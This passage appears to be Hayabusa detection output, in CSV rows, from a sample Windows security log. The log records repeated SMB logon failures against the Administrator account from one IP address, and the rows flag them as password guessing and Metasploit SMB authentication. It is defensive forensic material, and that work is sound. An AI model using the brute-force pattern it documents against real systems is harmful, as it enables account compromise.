NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
